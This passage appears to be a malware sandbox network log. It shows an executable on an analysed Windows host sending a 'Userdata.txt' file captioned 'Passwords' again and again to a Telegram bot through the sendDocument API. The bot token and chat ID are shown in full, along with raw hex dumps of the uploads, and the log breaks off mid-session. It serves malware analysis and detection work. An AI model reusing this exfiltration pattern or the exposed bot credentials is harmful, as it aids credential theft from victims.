2025-01-10 21:44:08 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 34 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43639,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545448,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	50027	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:09 UTC	298	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd330e9e22c452 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:44:09 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 30 65 39 65 32 32 63 34 35 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd330e9e22c452Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:10 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:09 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:10 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 34 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43640,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545449,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	50029	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:11 UTC	298	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd33226ffebf79 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:44:11 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 32 32 36 66 66 65 62 66 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd33226ffebf79Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:11 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:11 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:11 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 34 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 35 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43641,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545451,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	50031	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:12 UTC	298	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3334e233e59f Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:44:12 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 33 34 65 32 33 33 65 35 39 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3334e233e59fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:13 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:13 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:13 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 35 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43642,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545453,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	50033	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:14 UTC	298	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd33489733ac2d Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:44:14 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 34 38 39 37 33 33 61 63 32 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd33489733ac2dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:14 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:14 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:14 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 35 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43643,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545454,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	50035	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:16 UTC	298	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd335edc34d36f Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:44:16 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 35 65 64 63 33 34 64 33 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd335edc34d36fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:16 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:16 GMT Content-Type: application/json Content-Length: 543 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:16 UTC	543	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 35 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43644,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545456,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	50037	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:17 UTC	298	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3373c2fc3f18 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:44:17 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 37 33 63 32 66 63 33 66 31 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3373c2fc3f18Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:18 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:17 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:18 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 34 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 35 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43645,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545457,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	50039	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:19 UTC	298	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd338b355bade0 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:44:19 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 38 62 33 35 35 62 61 64 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd338b355bade0Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:44:19 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:44:19 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:44:19 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 35 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43646,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545459,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	50041	149.154.167.220	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:44:20 UTC	298	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd33a3e2842e8e Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
